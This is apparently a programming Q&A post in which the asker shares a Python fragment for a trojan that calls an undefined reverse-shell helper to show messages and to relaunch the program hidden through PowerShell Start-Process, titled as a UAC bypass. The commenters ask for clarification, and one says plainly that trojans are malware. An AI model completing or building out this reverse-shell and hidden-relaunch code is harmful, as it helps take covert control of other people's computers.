# Flag system to uac bypass

Tags: python, uac, trojan

I'm creating a system whose I'm going to have to run the program so that if it doesn't have a flag it will start itself, and it's kind of strange

```
try:
    flag = sys.argv[1:][0]
    utils.reverse_shell('msg * flag :) ')
except IndexError:
    utils.reverse_shell('msg * no flag ')
    utils.reverse_shell(f'Start-Process -FilePath "{acess.GetSelf()[0]}" --midia -WindowStyle Hidden')  
    utils.reverse_shell('msg * runnned ')
```

Comment: What is your question?  Note that "Start-Process" is a PowerShell command.  It won't work if the current shell is cmd.

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Comment: I can't parse your description of the system. What does "whose I'm going to have to run the program" mean?

Comment: Trojans are malware. Do you really expect us to help you do that?